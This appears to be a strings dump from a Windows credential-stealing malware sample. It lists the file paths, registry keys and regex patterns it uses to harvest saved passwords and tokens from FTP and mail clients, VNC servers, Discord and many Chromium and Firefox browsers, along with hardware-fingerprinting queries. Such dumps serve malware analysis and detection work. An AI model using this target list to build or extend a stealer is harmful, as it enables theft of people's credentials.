\Program Files (x86)\FTP Commander Deluxe\Ftplist.txt
;Password=
;User=
\VirtualStore\Program Files (x86)\FTP Commander\Ftplist.txt
\VirtualStore\Program Files (x86)\FTP Commander Deluxe\Ftplist.txt
\cftp\Ftplist.txt
\Program Files (x86)\FTP Commander\Ftplist.txt
;Anonymous=
FTPGetter
<server>
\FTPGetter\servers.xml
<server_ip>
</server_ip>
<server_port>
</server_port>
<server_user_name>
</server_user_name>
<server_user_password>
</server_user_password>
The Bat!
\The Bat!
\Account.CFN
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+-0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz
Becky!
\Mailbox.ini
Account
PassWd
SMTPServer
MailAddress
HKEY_CURRENT_USER\Software\RimArts\B2\Settings
DataDir
Folder.lst
Outlook
9375CFF0413111d3B88A00104B2A6676
Software\Microsoft\Office\11.0\Outlook\Profiles
Software\Microsoft\Office\12.0\Outlook\Profiles
Software\Microsoft\Office\14.0\Outlook\Profiles
Software\Microsoft\Office\15.0\Outlook\Profiles
Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Software\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676
Software\Microsoft\Office\16.0\Outlook\Profiles
IMAP Password
POP3 Password
HTTP Password
SMTP Password
Server
Windows Mail App
Software\Microsoft\ActiveSync\Partners
syncpassword
mailoutgoing
COMPlus_legacyCorruptedStateExceptionsPolicy
FoxMail
HKEY_CURRENT_USER\Software\Aerofox\FoxmailPreview
Executable
HKEY_CURRENT_USER\Software\Aerofox\Foxmail\V3.1
FoxmailPath
\Storage\
\VirtualStore\Program Files\Foxmail\mail
\VirtualStore\Program Files (x86)\Foxmail\mail
\Accounts\Account.rec0
\Account.stg
POP3Host
SMTPHost
IncomingServer
POP3Password
Opera Mail
\Opera Mail\Opera Mail\wand.dat
opera:
ijklmno
vwxyz1234567890_-.~!@#$%^&*()[{]}\|';:,<>/?+=
PocoMail
\Pocomail\accounts.ini
POPPass
SMTPPass
eM Client
Accounts
"Username":"
"Secret":"
72905C47-F4FD-4CF7-A489-4E8121A155BD
"ProviderName":"
eM Client\accounts.dat
o6806642kbM7c5
Mailbird
SenderIdentities
\Mailbird\Store\Store.db
Server_Host
Username
EncryptedPassword
TightVNC
Software\TightVNC\Server
RealVNC 4.x
SOFTWARE\Wow6432Node\RealVNC\WinVNC4
PasswordViewOnly
RealVNC 3.x
SOFTWARE\RealVNC\vncserver
Software\ORL\WinVNC3
TightVNC ControlPassword
ControlPassword
SOFTWARE\RealVNC\WinVNC4
TigerVNC
Software\TigerVNC\Server
UltraVNC
\uvnc bvba\UltraVNC\ultravnc.ini
passwd
passwd2
ProgramFiles
\UltraVNC\ultravnc.ini
JDownloader 2.0
JDownloader 2.0\cfg
org.jdownloader.settings.AccountSettings.accounts.ejs
jd.controlling.authentication.AuthenticationControllerSettings.list.ejs
Paltalk
Software\A.V.M.\Paltalk NG\common_settings\core\users\creds\
nickname
paltalk.com
Pidgin
\.purple\accounts.xml
<account>
<protocol>
</protocol>
<name>
</name>
<password>
</password>
Trillian
\Trillian\users\global\accounts.dat
trillian.im
MysqlWorkbench
\MySQL\Workbench\workbench_user_data.dat
Internet Downloader Manager
Software\DownloadManager\Passwords\
EncPassword
Discord
discord.com
Discord Token
[\w-]{24}\.[\w-]{6}\.[\w-]{27}
mfa\.[\w-]{84}
discordptb
Local Storage\leveldb
discordcanary
origin_url
username_value
Opera Stable
"encrypted_key":"(.*?)"
\Local State
\Login Data
\Default\Login Data
key4.db
metaData
nssPrivate
2a864886f70d0209
2a864886f70d010c050103
key3.db
global-salt
Version
password-check
Path=([A-z0-9\/\.\-]+)
[^\u0020-\u007F]
logins.json
\"(hostname|encryptedPassword|encryptedUsername)":"(.*?)"
signons.sqlite
moz_logins
hostname
encryptedUsername
encryptedPassword
Application:
Username:
Host:
Password:
<br>Application:
<br>Username:
<br>Password:
<br><hr>
SeaMonkey
\Mozilla\SeaMonkey\
Torch Browser
Torch\User Data
Kometa
Kometa\User Data
Orbitum
Orbitum\User Data
WaterFox
\Waterfox\
BraveSoftware\Brave-Browser\User Data
Comodo Dragon
Comodo\Dragon\User Data
Cool Novo
MapleStudio\ChromePlus\User Data
Amigo\User Data
Vivaldi
Vivaldi\User Data
PaleMoon
\Moonchild Productions\Pale Moon\
BlackHawk
\NETGATE Technologies\BlackHawk\
CyberFox
\8pecxstudios\Cyberfox\
Chedot
Chedot\User Data
Coowon
Coowon\Coowon\User Data
Elements Browser
Elements Browser\User Data
7Star\7Star\User Data
Chrome
Google\Chrome\User Data
Sputnik
Sputnik\Sputnik\User Data
K-Meleon
\K-Meleon\
CentBrowser
CentBrowser\User Data
Edge Chromium
Microsoft\Edge\User Data
Chromium
Chromium\User Data
Epic Privacy
Epic Privacy Browser\User Data
QIP Surf
QIP Surf\User Data
Opera Browser
Opera Software\Opera Stable
uCozMedia\Uran\User Data
Sleipnir 6
Fenrir Inc\Sleipnir5\setting\modules\ChromiumViewer
Iridium Browser
Iridium\User Data
Thunderbird
\Thunderbird\
Postbox
\Postbox\
Coccoc
CocCoc\Browser\User Data
Liebao Browser
liebao\User Data
Citrio
CatalinaGroup\Citrio\User Data
Yandex Browser
Yandex\YandexBrowser\User Data
IceDragon
\Comodo\IceDragon\
IceCat
\Mozilla\icecat\
Firefox
\Mozilla\Firefox\
360 Browser
360Chrome\Chrome\User Data
00061561
Berkelet DB
00000002
1.85 (Hash, version 2, native byte-order)
Unknow database format
SQLite format 3
UNIQUE
{0:X2}
SEQUENCE {
OCTETSTRING
INTEGER
OBJECTIDENTIFIER
Windows Credential
chrome
{{{0}}}
policy
sha512
ObjectLength
ChainingModeGCM
AuthTagLength
ChainingMode
KeyDataBlob
Microsoft Primitive Provider
:Zone.Identifier
SELECT * FROM Win32_Processor
win32_processor
processorID
d0ee4174-936c-442b-8301-1a8c42b12a8e
Win32_NetworkAdapterConfiguration
IPEnabled
MacAddress
f281fe6a-8898-4491-8a08-55ea8cf854ce
Win32_BaseBoard
SerialNumber
ba8d092e-c422-43f0-87eb-dcfc19a82c00
text/html
FormatID: {0}
Version: 0x{0:X}
StorageSize: {0} (0x{0:X})
Size of the SerializedPropertyStore is less than {0} ({1})
Version is not equal to {0} ({1})
Size of the SerializedPropertyStorage is less than 28 ({0})
{D5CDD505-2E9C-101B-9397-08002B2CF9AE}
Type: {0}
Value: {0}
ValueSize: {0} (0x{0:X})
NameSize: {0} (0x{0:X})
Name: {0}
Size of the StringName is less than 9 ({0})
Size of the StringName is not equal to {0} ({1})
Size of the NameSize is not equal to {0} ({1})
ID: 0x{0:X}
Size of the SerializedPropertyStore is less than 8 ({0})
StoreSize: {0} (0x{0X})
\Device\LanmanRedirector\
Failed to retrieve system handle information.
Accounts
logins
sha512
credential
VS_VERSION_INFO
VarFileInfo
Translation
StringFileInfo
000004b0
FileDescription
FileVersion
1.0.0.0
InternalName
5356fd20-acd2-43aa-8500-4456c5279c75.exe
LegalCopyright
OriginalFilename
5356fd20-acd2-43aa-8500-4456c5279c75.exe
ProductVersion
1.0.0.0
Assembly Version
1.0.0.0